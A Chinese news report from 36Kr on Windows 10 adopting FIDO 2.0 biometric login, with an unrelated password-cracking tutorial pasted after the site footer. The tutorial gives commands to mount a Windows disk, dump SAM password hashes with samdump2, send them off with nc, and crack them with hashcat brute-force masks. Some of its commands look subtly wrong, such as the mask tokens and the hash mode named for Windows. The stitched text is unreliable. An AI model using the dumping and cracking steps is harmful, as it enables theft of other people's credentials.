密碼作為一種安全訪問(wèn)的手段已經(jīng)變得越來(lái)越不安全。這一方面是由于破解能力的提升,另一方面則是由于技術(shù)體系永遠(yuǎn)的薄弱點(diǎn)—人。如我們?cè)谀阋詾槟阋詾榈暮妹艽a就是好密碼中提到的那樣,密碼的設(shè)置者的水平和意識(shí)往往令看似高強(qiáng)度的密碼不堪一擊。因此,越來(lái)越多的安全解決方案傾向于回避這一薄弱環(huán)節(jié),生物識(shí)別技術(shù)就是其中之一。
微軟也準(zhǔn)備在最新的操作系統(tǒng)中加入對(duì)此的支持。在上周五舉行的斯坦福網(wǎng)絡(luò)安全峰會(huì)上,微軟宣布Windows 10將會(huì)支持2.0的FIDO規(guī)范。FIDO即所謂的快速在線識(shí)別(Fast Identification Online)聯(lián)盟,其目標(biāo)就是要通過(guò)提高強(qiáng)制認(rèn)證設(shè)備的可交互性來(lái)消滅復(fù)雜難用的用戶名和密碼。前不久FIDO剛剛發(fā)布了1.0版的FIDO規(guī)范,微軟旋即表示要支持FIDO。身為FIDO總裁的微軟OS安全負(fù)責(zé)人Dustin Ingalls在博客中稱(chēng)“消滅密碼是微軟的最高優(yōu)先級(jí)之一。”屆時(shí)安裝Windows 10操作系統(tǒng)的設(shè)備將可以支持豐富的第三方生物識(shí)別閱讀器,同時(shí)Windows 10還會(huì)為硬件制造商提供一個(gè)簡(jiǎn)便的框架來(lái)實(shí)現(xiàn)筆記本或手機(jī)的增強(qiáng)認(rèn)證機(jī)制。到時(shí)候,很多應(yīng)用的登錄認(rèn)證可能只需要按按手指或掃描一下眼球即可完成,不再需要輸入丑陋的密碼。
除了微軟以外,F(xiàn)IDO聯(lián)盟也獲得了許多業(yè)界大公司的支持,Google、PayPal、聯(lián)想、美國(guó)銀行、MasterCard等均為聯(lián)盟成員。
除非注明,本站文章均為原創(chuàng)或編譯,轉(zhuǎn)載請(qǐng)注明: 文章來(lái)自 36氪
36氪官方iOS應(yīng)用正式上線,支持『一鍵下載36氪報(bào)道的移動(dòng)App』和『離線閱讀』立即下載!
例如我們?cè)诰W(wǎng)站隨意得到一個(gè)hash值,5f4dcc3b5aa765d61d8327deb882cf99,通過(guò)上述去判斷算法
mount /dev/sda1/mnt
cd /mnt/Windows/System32/config
samdump2 SYSTEM SAM -o sam.hash
利用nc傳輸HASH注:上述的需要拿到對(duì)方的電腦,不太現(xiàn)實(shí),不實(shí)際演示,只當(dāng)學(xué)習(xí)
拿到HASH值就需要用工具去破解密碼了
hashcat -b #查看電腦破解力度
hashcat -m 100 hash.dump pass.lst #可以破解windows中sam密碼
hashcat -m 0 hash.txt -a 3 ?|?|?|?|?|?|?|?|?d?d #使用掩碼動(dòng)態(tài)生成密碼
結(jié)果:hashcat.pot
hashcat -m 100 -a 3 hash -i --increment-min 6 --increment-max 8 ?|?|?|?|?|?|?|?| #增量密碼破解
##
?|=abcdefghijklmnopqrstuvwxyz
?u=ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d=0123456789
?s=!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a=?|?u?d?s
?b=0x00 - 0xff